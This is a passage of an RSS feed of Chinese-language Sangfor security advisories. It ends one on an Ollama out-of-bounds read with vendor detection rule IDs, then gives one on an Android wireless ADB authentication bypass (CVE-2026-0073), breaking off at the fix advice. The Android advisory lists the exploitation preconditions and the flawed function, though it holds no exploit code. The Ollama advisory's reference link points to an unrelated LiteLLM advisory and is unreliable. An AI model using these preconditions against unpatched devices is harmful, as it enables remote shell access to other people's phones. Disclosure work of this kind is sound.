border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、风险资产发现</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Ollama的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf=""> 已发布资产检测方案，指纹ID:0032100。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0032100。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞主动检测</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Ollama 越界读取漏洞(CVE-2026-7482)的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量快速检出业务场景中是否存在漏洞风险，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf="">预计2026年05月08日发布检测方案，规则ID:SF-2026-00907。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案，规则ID:SF-2026-01018。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案（需要具备TSS组件能力），规则ID:SF-2026-01018。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月08日发布检测方案（需要具备云镜组件能力），规则ID:SF-2026-00907。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3、漏洞安全监测</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Ollama 越界读取漏洞(CVE-2026-7482)的监测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可依据流量收集实时监控业务场景中的受影响资产情况，</span></span></strong><span leaf="">快速检查受影响范围，相关产品及服务如下：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全感知管理平台SIP】</span></span></strong><span leaf="">预计2026年05月11日发布监测方案，规则ID:11029716。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月11日发布监测方案（需要具备SIP组件能力），规则ID:11029716。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月11日发布监测方案，规则ID:11029716。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">4、漏洞安全防护</span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Ollama 越界读取漏洞(CVE-2026-7482)的防御，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可阻断攻击者针对该事件的入侵行为，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服下一代防火墙AF】</span></span></strong><span leaf="">预计2026年05月11日发布防护方案，规则ID:11029716。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服Web应用防火墙WAF】</span></span></strong><span leaf="">预计2026年05月11日发布防护方案，规则ID:11029716。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月11日发布防护方案（需要具备AF组件能力），规则ID:11029716。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月11日发布防护方案（需要具备AF组件能力），规则ID:11029716。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc" target="_blank">https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/05/06</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到Ollama 越界读取漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/05/06</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100041834" src="https://wechat2rss.xlab.app/img-proxy/?k=c35fe7bb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FAPc6NwjLsxQS0jYIQho85jjP7IzpxQy46tDBLSS7icFicP9NzbWuoz3oYgLTSDVqyxGaqch8TjNibq3t7kh0gD8w4R0Cbhs5JTcfaBXfhDOVcw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16352%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5624a52a&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525496%26idx%3D1%26sn%3D855b158f3eedb70985dfb85471828ee9">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 06 May 2026 21:45:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】Android ADB认证绕过漏洞(CVE-2026-0073)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525496&amp;idx=2&amp;sn=e47ded0c6c6b5367635dba0679275333</link>
      <description>2026年5月6日，深瞳漏洞实验室监测到一则Android System组件存在绕过认证漏洞的信息，漏洞编号：CVE-2026-0073，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-05-06 21:45</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=5a009896&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxRtStRtjDcJicWic5BXO9GNU4oGFtdpFib3jDxc0lN0eJk4rKunk64C33YfIPiaEUxPslqDicialyT57Psib39BDuPQyiafMQk7ibCsia48U%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年5月6日，深瞳漏洞实验室监测到一则Android System组件存在绕过认证漏洞的信息，漏洞编号：CVE-2026-0073，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041821" src="https://wechat2rss.xlab.app/img-proxy/?k=2fc8a510&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxT1AfBicicjeS3IjnJsWCEUyzcwFhQrnYTDuSehV6ZCdyb07llqRAOI4PIe7NCGKibOEOhyjT2WfaXBDvWZlhH7HKZ8mCv5AibY6rw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Android ADB认证绕过漏洞(CVE-2026-0073)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Android System</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Android 14</span><span leaf=""><br/></span><span leaf="">Android 15</span><span leaf=""><br/></span><span leaf="">Android 16</span><span leaf=""><br/></span><span leaf="">Android 16-qpr2</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">以上范围中未合入2026年5月安全补丁的版本。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绕过认证</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：无需用户认证</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：①设备开启 Developer options 和 Wireless debugging 或暴露 ADB TCP 服务。②设备/data/misc/adb/adb_keys文件包含至少一个先前配对的 RSA ADB 主机密钥。③攻击者能够访问该 ADB TCP 端口，例如处于同一局域网。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：容易，无需认证即可获取目标shell。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，零点击即可获取目标shell。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041820" src="https://wechat2rss.xlab.app/img-proxy/?k=44ac0ce3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRmiclwS2bLzEiaHxRbV0vVzzWBbSkgrM2Jv9pcETOqoluiaxOEzCXYKV6jsfqK2XGfVDB6I4nbKgCPu4G8YcbRPyMIoAnTiaV2gBQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Android System 是安卓操作系统的核心层，负责管理硬件资源、进程调度、内存分配以及提供基础的系统服务（如应用启动、网络通信、权限控制等），是所有应用运行的基础环境。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041818" src="https://wechat2rss.xlab.app/img-proxy/?k=2b5b416d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSIFqwc2f0ljX69XmPafZyibGkL7O0Dtbu5k50FHicgujWmFKKeibXwUnJoqyd0A6hAkDxE0lMiavtaGdpQjc0ItP8tHP362FF0iafA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年5月6日，深瞳漏洞实验室监测到一则Android System组件存在绕过认证漏洞的信息，漏洞编号：CVE-2026-0073，漏洞威胁等级：高危。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">auth.cpp 文件内的 adbd_tls_verify_cert 函数存在逻辑漏洞，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">攻击者可借此绕过无线 ADB 双向认证握手流程。攻击成功后，无需额外权限与用户交互，即可在设备的 shell 用户权限下执行任意代码，实现近距离远程代码执行。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的Android System版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Android 14</span><span leaf=""><br/></span><span leaf="">Android 15</span><span leaf=""><br/></span><span leaf="">Android 16</span><span leaf=""><br/></span><span leaf="">Android 16-qpr2</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">以上范围中未合入 2026 年 5 月安全补丁的版本。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041819" src="https://wechat2rss.xlab.app/img-proxy/?k=2e7ca531&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQxwf8Vd5Ak3YVCu6ibwpehkCLbVZFic9A7NcjMRPLneqRYjkyibAFPxRGkSgf8YwxdJ8eGvxyicjV3icfAfwb60pyboyica1PdlzRW8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布 2026 年 5 